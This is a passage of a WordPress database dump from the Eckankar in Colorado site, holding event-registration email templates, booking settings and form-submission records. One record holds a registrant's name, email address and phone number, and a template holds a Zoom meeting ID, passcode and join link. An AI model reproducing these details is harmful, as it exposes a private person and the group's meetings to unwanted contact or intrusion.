max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(192855,269146,'passster_protection_type','password'),(192854,269146,'passster_activate_protection',NULL),(192853,269146,'passster_activate_global_protection',NULL),(192852,269146,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(192851,269146,'boldgrid_hide_page_title','0'),(192850,269146,'mec_display_cancellation_reason_in_single_page',''),(185775,268680,'_wp_attached_file','2023/06/Butterfly.webp'),(185776,268680,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:337;s:4:\"file\";s:22:\"2023/06/Butterfly.webp\";s:8:\"filesize\";i:32218;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"Butterfly-350x196.webp\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:11908;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"Butterfly-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:5446;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:22:\"Butterfly-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:13094;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:22:\"Butterfly-500x337.webp\";s:5:\"width\";i:500;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:24234;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:22:\"Butterfly-474x324.webp\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:20792;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:22:\"Butterfly-391x260.webp\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15990;}s:8:\"tileview\";a:5:{s:4:\"file\";s:22:\"Butterfly-300x337.webp\";s:5:\"width\";i:300;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15498;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(193840,269222,'_field_649',''),(193839,269222,'_field_656','The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom'),(193838,269222,'_field_651','(130) 369-3659'),(193837,269222,'_field_653','mtom178488@sbcglobal.net'),(193832,269221,'_field_649',''),(193833,269221,'_form_id','61'),(193834,269221,'_seq_num','77'),(193835,269222,'_field_654','Monica'),(193836,269222,'_field_652','Tom'),(185788,265425,'passster_area_shortcode',''),(185789,265425,'mec_cost_auto_calculate','0'),(185790,265425,'mec_style_per_event','global'),(185791,265425,'mec_trailer_url',''),(185792,265425,'mec_trailer_title',''),(185793,265425,'mec_start_datetime','2022-01-06 08:00 AM'),(185794,265425,'mec_end_datetime','2022-01-06 06:00 PM'),(185795,265425,'mec_sequence','6'),(190563,265919,'mec_start_datetime','2021-11-09 07:00 PM'),(190564,265919,'mec_end_datetime','2021-11-09 08:30 PM'),(190565,265919,'mec_sequence','3'),(185796,265425,'mec_event_gallery','a:0:{}'),(185797,265425,'mec_related_events','a:0:{}'),(185798,265425,'mec_banner','a:0:{}'),(185799,266467,'mec_cost_auto_calculate','0'),(185800,266467,'mec_style_per_event','global'),(185801,266467,'mec_trailer_url',''),(185802,266467,'mec_trailer_title',''),(185803,266467,'mec_start_datetime','2022-05-14 10:00 AM'),(185804,266467,'mec_end_datetime','2022-05-14 02:00 PM'),(185805,266467,'mec_sequence','1'),(185806,266467,'mec_event_gallery','a:0:{}'),(185807,266467,'mec_related_events','a:0:{}'),(185808,266467,'mec_banner','a:0:{}'),(192849,269146,'mec_cancelled_reason',''),(185810,268685,'mec_color',''),(185811,268685,'mec_location_id','118'),(185812,268685,'mec_dont_show_map','0'),(185813,268685,'mec_organizer_id','1'),(185814,268685,'mec_read_more',''),(185815,268685,'mec_more_info',''),(185816,268685,'mec_more_info_title',''),(185817,268685,'mec_more_info_target','_self'),(185818,268685,'mec_cost',''),(185819,268685,'mec_currency','a:0:{}'),(185820,268685,'mec_additional_organizer_ids','a:0:{}'),(185821,268685,'mec_additional_location_ids','a:0:{}'),(185822,268685,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-07-02\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-07-02\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(185823,268685,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(185824,268685,'mec_certain_weekdays','a:0:{}'),(185825,268685,'mec_allday','0'),(185826,268685,'one_occurrence','0'),(185827,268685,'mec_hide_time','0'),(185828,268685,'mec_hide_end_time','0'),(185829,268685,'mec_comment',''),(185830,268685,'mec_timezone','global'),(185831,268685,'mec_countdown_method','global'),(185832,268685,'mec_public','1'),(185833,268685,'mec_start_date','2023-07-02'),(185834,268685,'mec_start_time_hour','10'),(185835,268685,'mec_start_time_minutes','30'),(185836,268685,'mec_start_time_ampm','AM'),(185837,268685,'mec_start_day_seconds','37800'),(185838,268685,'mec_end_date','2023-07-02'),(185839,268685,'mec_end_time_hour','11'),(185840,268685,'mec_end_time_minutes','30'),(185841,268685,'mec_end_time_ampm','AM'),(185842,268685,'mec_end_day_seconds','41400'),(185843,268685,'mec_repeat_status','0'),(185844,268685,'mec_repeat_type',''),(185845,268685,'mec_repeat_interval','1'),(185846,268685,'mec_repeat_end',''),(185847,268685,'mec_repeat_end_at_occurrences',''),(185848,268685,'mec_repeat_end_at_date',''),(185849,268685,'mec_advanced_days','a:0:{}'),(185850,268685,'mec_in_days',''),(185851,268685,'mec_not_in_days',''),(185852,268685,'mec_hourly_schedules','a:0:{}'),(185853,268685,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(185854,268685,'mec_tickets','a:1:{i:1;a:20:{s:4:\"name\";s:32:\"Experience HU, The Sound of Soul\";s:22:\"ticket_start_time_hour\";s:0:\"\";s:24:\"ticket_start_time_minute\";s:1:\"0\";s:22:\"ticket_start_time_ampm\";s:0:\"\";s:20:\"ticket_end_time_hour\";s:2:\"01\";s:22:\"ticket_end_time_minute\";s:1:\"0\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:5:\"seats\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:14:\"maximum_ticket\";s:0:\"\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}s:2:\"id\";i:1;}}'),(185855,268685,'mec_fees_global_inheritance','1'),(185856,268685,'mec_fees','a:0:{}'),(185857,268685,'mec_ticket_variations_global_inheritance','1'),(185858,268685,'mec_ticket_variations','a:0:{}'),(185859,268685,'mec_reg_fields_global_inheritance','1'),(185860,268685,'mec_reg_fields','a:0:{}'),(185861,268685,'mec_bfixed_fields','a:0:{}'),(185862,268685,'mec_op','a:0:{}'),(185863,268685,'mec_fields','a:0:{}'),(185864,268685,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:10264:\"<table id=\"u_body\" style=\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #f1f1f1; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"vertical-align: top;\">\r\n<td style=\"word-break: break-word; border-collapse: collapse !important; vertical-align: top;\">\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"height: 100%; width: 100% !important;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 0px; padding-left: 0px;\" align=\"center\"><img style=\"outline: none; text-decoration: none; -ms-interpolation-mode: bicubic; clear: both; display: inline-block !important; border: none; height: auto; float: none; width: 100%; max-width: 480px;\" title=\"\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"480\" align=\"middle\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\">\r\n<p><span style=\"font-size: 20pt; font-weight: bold;\">Event Registration Confirmation</span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 17px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 26px; font-size: 16px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 24px; color: #f28a27; font-weight: 600;\">Zoom Login Information:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 15px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">See you there!</p>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div>\r\n<p style=\"padding: 20px; font-size: 16px; line-height: 22px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this 